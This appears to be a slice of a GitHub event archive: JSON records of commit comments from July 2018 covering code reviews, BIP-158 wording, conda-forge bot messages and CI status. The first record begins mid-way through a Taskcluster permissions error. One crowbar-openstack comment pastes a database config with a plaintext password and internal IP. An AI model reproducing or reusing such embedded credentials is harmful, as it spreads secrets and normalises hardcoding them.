\"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/WKTYOVYUQyyWY1MrgOQ15A\",\n            \"queue:schedule-task:taskcluster-github/WKTYOVYUQyyWY1MrgOQ15A/WKTYOVYUQyyWY1MrgOQ15A\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/WKTYOVYUQyyWY1MrgOQ15A\",\n                \"queue:schedule-task:taskcluster-github/WKTYOVYUQyyWY1MrgOQ15A/WKTYOVYUQyyWY1MrgOQ15A\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-05T04:43:59.497Z\n\n</details>"}},"created_at":"2018-07-05T04:43:59Z"}
{"id":"7920945668","type":"CommitCommentEvent","actor":{"login":"gunterze"},"repo":{"name":"dcm4che/dcm4chee-arc-light"},"payload":{"comment":{"id":29601373,"position":42,"line":217,"path":"dcm4chee-arc-qmgt-rs/src/main/java/org/dcm4chee/arc/qmgt/rs/QueueManagerRS.java","commit_id":"ebf972aff19c93280c2a68df63b15a046bf38fbc","created_at":"2018-07-05T04:44:09Z","updated_at":"2018-07-05T04:44:09Z","author_association":"MEMBER","body":"Replace by:\r\n```java\r\n            String devName = newDeviceName != null ? newDeviceName : mgr.findDeviceNameByMsgId(msgId);\r\n            if (devName == null)\r\n                return rsp(Response.Status.NOT_FOUND, \"Task not found\");\r\n\r\n            if (!devName.equals(device.getDeviceName()))\r\n                return rsClient.forward(request, newDeviceName);\r\n\r\n            mgr.rescheduleTask(msgId, null, queueEvent);\r\n            return rsp(Response.Status.NO_CONTENT);\r\n```"}},"created_at":"2018-07-05T04:44:09Z"}
{"id":"7920945909","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29601374,"position":null,"line":null,"path":null,"commit_id":"17ee75c2c3c431bc7c6560ff1eac87dbceb62ef4","created_at":"2018-07-05T04:44:17Z","updated_at":"2018-07-05T04:44:17Z","author_association":"OWNER","body":"Mmmhhh... I think the major problem at the moment is that voting is inherently broken for negative scores. I first want to fix that."}},"created_at":"2018-07-05T04:44:17Z"}
{"id":"7920948604","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"psiemiatkowski/Tasks"},"payload":{"comment":{"id":29601382,"position":8,"line":53,"path":"src/main/java/com/crud/tasks/trello/client/TrelloClient.java","commit_id":"5d5bf9e11555a25185314ca464bb2d9c08ffa468","created_at":"2018-07-05T04:45:42Z","updated_at":"2018-07-05T04:45:42Z","author_association":"NONE","body":"Optional nie jest przypisany do niczego. Ten fragment powinien być wewnątrz asList. Zamiast trelloBoardDtoList w argumencie ofNullable, powinien być boardsResponse"}},"created_at":"2018-07-05T04:45:42Z"}
{"id":"7920953692","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29601385,"position":null,"line":null,"path":null,"commit_id":"2473ea1407b2add7108fc5ff52f384384d55cc75","created_at":"2018-07-05T04:48:22Z","updated_at":"2018-07-05T04:48:22Z","author_association":"CONTRIBUTOR","body":"hahaha :rofl: \r\n\r\n:roll_eyes: "}},"created_at":"2018-07-05T04:48:22Z"}
{"id":"7920954121","type":"CommitCommentEvent","actor":{"login":"gunterze"},"repo":{"name":"dcm4che/dcm4chee-arc-light"},"payload":{"comment":{"id":29601386,"position":22,"line":355,"path":"dcm4chee-arc-qmgt/src/main/java/org/dcm4chee/arc/qmgt/impl/QueueManagerEJB.java","commit_id":"ebf972aff19c93280c2a68df63b15a046bf38fbc","created_at":"2018-07-05T04:48:36Z","updated_at":"2018-07-05T04:48:36Z","author_association":"MEMBER","body":"No need to pass newDeviceName - it's always device.getDeviceName()!"}},"created_at":"2018-07-05T04:48:36Z"}
{"id":"7920955018","type":"CommitCommentEvent","actor":{"login":"TheLimeGlass"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29601388,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T04:49:01Z","updated_at":"2018-07-05T04:49:01Z","author_association":"CONTRIBUTOR","body":"`[(all [[of] the]|the)]`"}},"created_at":"2018-07-05T04:49:01Z"}
{"id":"7920957684","type":"CommitCommentEvent","actor":{"login":"jsbao0428"},"repo":{"name":"jsbao0428/LineHeroku"},"payload":{"comment":{"id":29601392,"position":null,"line":null,"path":null,"commit_id":"e32cab72612c3fd8e877c0c47fa9a3a003898c35","created_at":"2018-07-05T04:50:23Z","updated_at":"2018-07-05T04:50:23Z","author_association":"OWNER","body":"fix"}},"created_at":"2018-07-05T04:50:23Z"}
{"id":"7920958271","type":"CommitCommentEvent","actor":{"login":"Roasbeef"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29601393,"position":12,"line":280,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-05T04:50:42Z","updated_at":"2018-07-05T04:50:42Z","author_association":"CONTRIBUTOR","body":"That wording would be more liberal than what is intended. The goal is to constrain what we filter out to \"null data\" (which is standard) output scripts. "}},"created_at":"2018-07-05T04:50:42Z"}
{"id":"7920958448","type":"CommitCommentEvent","actor":{"login":"TheLimeGlass"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29601395,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T04:50:48Z","updated_at":"2018-07-05T04:50:48Z","author_association":"CONTRIBUTOR","body":"Also make this a PropertyExpression or SimplePropertyExpression wtf."}},"created_at":"2018-07-05T04:50:48Z"}
{"id":"7920959298","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pynumpress-feedstock"},"payload":{"comment":{"id":29601396,"position":null,"line":null,"path":null,"commit_id":"0a5867878c4c07285cf6c5cfdd42702f70eefb0a","created_at":"2018-07-05T04:51:16Z","updated_at":"2018-07-05T04:51:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @corburn were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @corburn were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T04:51:16Z"}
{"id":"7920961282","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-future.batchtools-feedstock"},"payload":{"comment":{"id":29601401,"position":null,"line":null,"path":null,"commit_id":"65abd9cb5678a5ffd57781416952e1c092831a3d","created_at":"2018-07-05T04:52:16Z","updated_at":"2018-07-05T04:52:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T04:52:16Z"}
{"id":"7920962224","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29601402,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-05T04:52:44Z","updated_at":"2018-07-05T04:52:44Z","author_association":"NONE","body":"this fixed sdcard detect on pa23?"}},"created_at":"2018-07-05T04:52:44Z"}
{"id":"7920962356","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-gribr-feedstock"},"payload":{"comment":{"id":29601403,"position":null,"line":null,"path":null,"commit_id":"8a27f3406ee409970aff5fdad002d61430f5af8a","created_at":"2018-07-05T04:52:47Z","updated_at":"2018-07-05T04:52:47Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nawendt were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @nawendt were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T04:52:47Z"}
{"id":"7920963744","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-parallelmap-feedstock"},"payload":{"comment":{"id":29601409,"position":null,"line":null,"path":null,"commit_id":"803f67f8b5854220601c8b2b60d99cb7427b7d4d","created_at":"2018-07-05T04:53:27Z","updated_at":"2018-07-05T04:53:27Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T04:53:27Z"}
{"id":"7920964766","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-paramhelpers-feedstock"},"payload":{"comment":{"id":29601411,"position":null,"line":null,"path":null,"commit_id":"1dffa108a02e9b525c2eeb88e96b6a0aed8dd600","created_at":"2018-07-05T04:53:58Z","updated_at":"2018-07-05T04:53:58Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T04:53:58Z"}
{"id":"7920966250","type":"CommitCommentEvent","actor":{"login":"tamasblummer"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29601412,"position":12,"line":280,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-05T04:54:41Z","updated_at":"2018-07-05T04:54:41Z","author_association":"NONE","body":"what is then an \"OP_RETURN output\" here ? A script starting with OP_RETURN without any following data? "}},"created_at":"2018-07-05T04:54:41Z"}
{"id":"7920966459","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-stm-feedstock"},"payload":{"comment":{"id":29601413,"position":null,"line":null,"path":null,"commit_id":"1aff98a93ac4192df31b72443ac07e49891bd38a","created_at":"2018-07-05T04:54:49Z","updated_at":"2018-07-05T04:54:49Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @stevierene82 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T04:54:49Z"}
{"id":"7920969163","type":"CommitCommentEvent","actor":{"login":"AR98"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29601415,"position":5,"line":71,"path":"app/src/main/java/com/example/android/miwok/WordAdapter.java","commit_id":"b1c2ccba98a58f77d332529c07d95ccfba083224","created_at":"2018-07-05T04:56:11Z","updated_at":"2018-07-05T04:56:11Z","author_association":"NONE","body":"why we use currentWord here?"}},"created_at":"2018-07-05T04:56:11Z"}
{"id":"7920971884","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/sstp-client-feedstock"},"payload":{"comment":{"id":29601418,"position":null,"line":null,"path":null,"commit_id":"3f01f42fde9cbe1f945f0c0d778f5317e9e0a400","created_at":"2018-07-05T04:57:29Z","updated_at":"2018-07-05T04:57:29Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @asmeurer were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T04:57:29Z"}
{"id":"7920974258","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29601420,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T04:58:38Z","updated_at":"2018-07-05T04:58:38Z","author_association":"MEMBER","body":"i avoided that because multiple patterns are easier to read"}},"created_at":"2018-07-05T04:58:38Z"}
{"id":"7920976963","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29601423,"position":38,"line":38,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-05T04:59:59Z","updated_at":"2018-07-05T04:59:59Z","author_association":"NONE","body":"1. Add a mysql database section (obvously database, user, password needs to exist) to /srv/www/openstack-dashboard/openstack_dashboard/local/local_settings.d/_100_local_settings.py\r\n\r\n```\r\nDATABASES = {\r\n    'default': {\r\n        'ENGINE': 'django.db.backends.postgresql_psycopg2',\r\n        'HOST': '192.168.152.84',\r\n        'NAME': 'horizon',\r\n        'PASSWORD': 'BtIjYmlaZFrd',\r\n        'USER': 'horizon',\r\n        'default-character-set': 'utf8',\r\n    },\r\n    'mysql': {\r\n        'ENGINE': 'django.db.backends.mysql',\r\n        'HOST': '192.168.152.84',\r\n        'NAME': 'horizon',\r\n        'PASSWORD': 'BtIjYmlaZFrd',\r\n        'USER': 'horizon',\r\n        'default-character-set': 'utf8',\r\n    },\r\n}\r\n\r\n```\r\n2. Django uses the python-mysql package to talk to mysql :(\r\n`# zypper install python-mysql\r\n`\r\n3. Run the migrate to generate the tables/schemas (not data).\r\n`# python /srv/www/openstack-dashboard/manage.py migrate --database mysql`\r\n\r\n**NOTE:** django can do the data migration, it dumps to a json format and then you import it. But let's try Ralf's tool:\r\n```\r\n# python psql2mysql.py --source postgresql://$user_db:$pw@192.168.152.84/$user_db --target mysql+pymysql://$user_db:$pw@192.168.152.84/$user_db?charset=utf8 migrate \r\nmigrate\r\n2018-07-05 04:54:16.213 8523 INFO __main__ [-] Disabling constraints on target DB for the migration\r\n2018-07-05 04:54:16.283 8523 INFO __main__ [-] Migrating table: 'auth_group'\r\n2018-07-05 04:54:16.286 8523 INFO __main__ [-] Table 'auth_group' is empty\r\n2018-07-05 04:54:16.287 8523 INFO __main__ [-] Migrating table: 'django_content_type'\r\n2018-07-05 04:54:16.298 8523 INFO __main__ [-] Rowcount 5\r\n2018-07-05 04:54:16.318 8523 INFO __main__ [-] Migrating table: 'django_migrations'\r\n2018-07-05 04:54:16.328 8523 INFO __main__ [-] Rowcount 9\r\n2018-07-05 04:54:16.359 8523 INFO __main__ [-] Migrating table: 'django_session'\r\n2018-07-05 04:54:16.385 8523 INFO __main__ [-] Table 'django_session' is empty\r\n2018-07-05 04:54:16.389 8523 INFO __main__ [-] Migrating table: 'openstack_auth_user'\r\n2018-07-05 04:54:16.429 8523 INFO __main__ [-] Table 'openstack_auth_user' is empty\r\n2018-07-05 04:54:16.430 8523 INFO __main__ [-] Migrating table: 'auth_permission'\r\n2018-07-05 04:54:16.441 8523 INFO __main__ [-] Rowcount 15\r\n2018-07-05 04:54:16.530 8523 INFO __main__ [-] Migrating table: 'auth_group_permissions'\r\n2018-07-05 04:54:16.591 8523 INFO __main__ [-] Table 'auth_group_permissions' is empty\r\n```"}},"created_at":"2018-07-05T04:59:59Z"}
{"id":"7920978291","type":"CommitCommentEvent","actor":{"login":"ladyada"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29601430,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-05T05:00:32Z","updated_at":"2018-07-05T05:00:32Z","author_association":"MEMBER","body":"lets do what we did for samd21, its much easier for you! 😁\r\nhttps://github.com/adafruit/circuitpython/tree/master/ports/atmel-samd/boards\r\nwe define in the board file whether the variant has flash ornot...see the subfolders above!\r\n\r\nfor example, trinket m0 is internal flash, but itsybitsy m0 express has external flash\r\n\r\nwe can make new variants for every kind of board, if the spi flash fails it should not continue and try to use internal flash...i think it will be extra work for a rare case, this way no os confusion when the disk changes either"}},"created_at":"2018-07-05T05:00:32Z"}
{"id":"7920980852","type":"CommitCommentEvent","actor":{"login":"SalahudinMalik"},"repo":{"name":"aranta-rokade/taxonomy-editor-tree"},"payload":{"comment":{"id":29601431,"position":null,"line":null,"path":null,"commit_id":"ab1621f1a2264eff9f74a5ab2d9b7af7a4383026","created_at":"2018-07-05T05:01:43Z","updated_at":"2018-07-05T05:01:43Z","author_association":"NONE","body":"seems good"}},"created_at":"2018-07-05T05:01:43Z"}
{"id":"7920981054","type":"CommitCommentEvent","actor":{"login":"abhishekgarg96"},"repo":{"name":"THEOplayer/android-sdk-starter-project"},"payload":{"comment":{"id":29601432,"position":null,"line":null,"path":null,"commit_id":"b57ccd82f8b6391636245d74f4f2a68faae227c4","created_at":"2018-07-05T05:01:48Z","updated_at":"2018-07-05T05:01:48Z","author_association":"NONE","body":"How can we play the clear key content via the key and keyid.\r\nlike instead of licenseURL, I want to provide key to the player"}},"created_at":"2018-07-05T05:01:48Z"}
{"id":"7920981160","type":"CommitCommentEvent","actor":{"login":"tamasblummer"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29601433,"position":12,"line":280,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-05T05:01:51Z","updated_at":"2018-07-05T05:01:51Z","author_association":"NONE","body":"If you want to filter out \"standard\" OP_RETURN output then we need a definition of that. I could not find a BIP defining."}},"created_at":"2018-07-05T05:01:51Z"}
{"id":"7920983238","type":"CommitCommentEvent","actor":{"login":"ladyada"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29601435,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-05T05:02:53Z","updated_at":"2018-07-05T05:02:53Z","author_association":"MEMBER","body":"(but, i think we should still start with internal flash...them get qspi working once internal flash is ok)\r\n\r\nlet me know if you have more questions...i know this is really confusing and theres a ton of decisions to make! 😔"}},"created_at":"2018-07-05T05:02:53Z"}
{"id":"7920983598","type":"CommitCommentEvent","actor":{"login":"rajlilawati"},"repo":{"name":"zhiwehu/Python-programming-exercises"},"payload":{"comment":{"id":29601436,"position":26,"line":806,"path":"100+ Python challenging programming exercises.txt","commit_id":"e379474ed8ca6a830bc9c0bb1742731fa3588bd2","created_at":"2018-07-05T05:03:03Z","updated_at":"2018-07-05T05:03:03Z","author_association":"NONE","body":"a=input(\"enter first string\")\r\nb=len(a)\r\nc=input(\"Enter the second string :\")\r\nd=len(c)\r\nif b==d :\r\n   print(a)\r\n   print(c)\r\nprint(\"Length are not equal \" )   "}},"created_at":"2018-07-05T05:03:03Z"}
{"id":"7920984458","type":"CommitCommentEvent","actor":{"login":"lilidream"},"repo":{"name":"lilidream/WeatherGirl"},"payload":{"comment":{"id":29601438,"position":null,"line":null,"path":null,"commit_id":"7ab22146b1c1aeeaaa74b9ce0963ba94fa7e2b14","created_at":"2018-07-05T05:03:26Z","updated_at":"2018-07-05T05:03:26Z","author_association":"OWNER","body":"WeatherGirl 2.0"}},"created_at":"2018-07-05T05:03:26Z"}
{"id":"7920986859","type":"CommitCommentEvent","actor":{"login":"shravyabss"},"repo":{"name":"shravyabss/Git-hub-tutorial"},"payload":{"comment":{"id":29601440,"position":null,"line":null,"path":null,"commit_id":"3c55afe8d17d76bf98f861f730aef9277620bb46","created_at":"2018-07-05T05:04:36Z","updated_at":"2018-07-05T05:04:36Z","author_association":"OWNER","body":"![hand-pointer](https://user-images.githubusercontent.com/40791585/42303449-fc777482-803e-11e8-8f29-b520c9b172cb.png)\r\n"}},"created_at":"2018-07-05T05:04:36Z"}
{"id":"7920988281","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29601444,"position":null,"line":null,"path":null,"commit_id":"849453a6122f7a841bf36332fff1581c1be393df","created_at":"2018-07-05T05:05:12Z","updated_at":"2018-07-05T05:05:12Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/69/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/69//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/849453a6122f7a841bf36332fff1581c1be393df/69/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/849453a6122f7a841bf36332fff1581c1be393df/69/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/849453a6122f7a841bf36332fff1581c1be393df/69/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/849453a6122f7a841bf36332fff1581c1be393df/69/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T05:05:12Z"}
{"id":"7920990819","type":"CommitCommentEvent","actor":{"login":"sipa"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29601448,"position":12,"line":null,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-05T05:06:22Z","updated_at":"2018-07-05T05:06:22Z","author_association":"MEMBER","body":"How about \"Any scriptPubKey whose first byte is OP_RETURN, or is over 10000 bytes\". Those are provably unspendable, and having a size limit may be useful too?"}},"created_at":"2018-07-05T05:06:22Z"}
{"id":"7920991410","type":"CommitCommentEvent","actor":{"login":"goodmami"},"repo":{"name":"delph-in/pydmrs"},"payload":{"comment":{"id":29601450,"position":null,"line":null,"path":null,"commit_id":"c1cd2953578f367e2f2a9e62e6b9914bc03d694e","created_at":"2018-07-05T05:06:40Z","updated_at":"2018-07-05T05:06:40Z","author_association":"MEMBER","body":"@guyemerson yes, I wrote that wiki after consulting some summit discussions and email threads about how we *should* handle predicates. In practice, the tools do not always live up to this standard, so I chose to follow the spec within PyDelphin but I don't alter the form for serialization. In fact, I'm tempted to say that enforcing lowercase on serialization is a kind of case-sensitivity, since upper case are just as valid as lowercase (consider a grammar developer and using all uppercase for predicate names; it goes against convention but still follows the spec, I think). One counterpoint is that the LKB code for generating the SEM-I downcases everything, if that is to be taken as a standard or reference-implementation.\r\n\r\nHowever I agree that if you're going to downcase the lemma, you should also downcase the pos and sense.\r\n\r\nAnd in any case, I don't mean to be so opinionated. I just meant to point out the potential (if rare) incompatibility with ACE :)"}},"created_at":"2018-07-05T05:06:40Z"}
{"id":"7920993118","type":"CommitCommentEvent","actor":{"login":"Roasbeef"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29601452,"position":12,"line":null,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-05T05:07:26Z","updated_at":"2018-07-05T05:07:26Z","author_association":"CONTRIBUTOR","body":"Just pushed a version with more precise language.\n\nOn Thu, Jul 5, 2018 at 12:06 AM Pieter Wuille <notifications@github.com>\nwrote:\n\n> How about \"Any scriptPubKey whose first byte is OP_RETURN, or is over\n> 10000 bytes\". Those are provably unspendable, and having a size limit may\n> be useful too?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bitcoin/bips/commit/6cc0c85a10b013107f45e01c5580a924f97f6e5b#commitcomment-29601448>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA87Lg7EPcZAIjqvX5eoVVRCSBt6Zym_ks5uDZ7dgaJpZM4VDAxU>\n> .\n>\n"}},"created_at":"2018-07-05T05:07:26Z"}
{"id":"7920996264","type":"CommitCommentEvent","actor":{"login":"tamasblummer"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29601460,"position":12,"line":280,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-05T05:08:55Z","updated_at":"2018-07-05T05:08:55Z","author_association":"NONE","body":"There are many other unspendable scripts, we get huge complexity if trying to capture that."}},"created_at":"2018-07-05T05:08:55Z"}
{"id":"7920996531","type":"CommitCommentEvent","actor":{"login":"SamyBencherif"},"repo":{"name":"rookie1024/RogueClicker"},"payload":{"comment":{"id":29601462,"position":null,"line":null,"path":null,"commit_id":"fc6c04376ca061b0b71a714a443266638bc13be1","created_at":"2018-07-05T05:09:04Z","updated_at":"2018-07-05T05:09:04Z","author_association":"NONE","body":"My mother gets insulted better than that"}},"created_at":"2018-07-05T05:09:04Z"}
{"id":"7920996633","type":"CommitCommentEvent","actor":{"login":"rajlilawati"},"repo":{"name":"zhiwehu/Python-programming-exercises"},"payload":{"comment":{"id":29601463,"position":36,"line":834,"path":"100+ Python challenging programming exercises.txt","commit_id":"e379474ed8ca6a830bc9c0bb1742731fa3588bd2","created_at":"2018-07-05T05:09:07Z","updated_at":"2018-07-05T05:09:07Z","author_association":"NONE","body":"def fun(a) : \r\n   if a%2==0 : \r\n    print(\"It is even number \")\r\n   else  : \r\n     print(\"it is odd number \")\r\nx=input(\"Enter number:\")\r\nx=int(x) # convert string to integer \r\nfun(x)\r\n"}},"created_at":"2018-07-05T05:09:07Z"}
{"id":"7920998281","type":"CommitCommentEvent","actor":{"login":"woodman201"},"repo":{"name":"apache/trafficserver"},"payload":{"comment":{"id":29601464,"position":4,"line":4,"path":".vscode/c_cpp_properties.json","commit_id":"6799fdb95436c91b4b2cde5ebd2e5bfb2657db94","created_at":"2018-07-05T05:09:52Z","updated_at":"2018-07-05T05:09:52Z","author_association":"NONE","body":"Donna Santiago Woodman is mother\r\n\r\n"}},"created_at":"2018-07-05T05:09:52Z"}
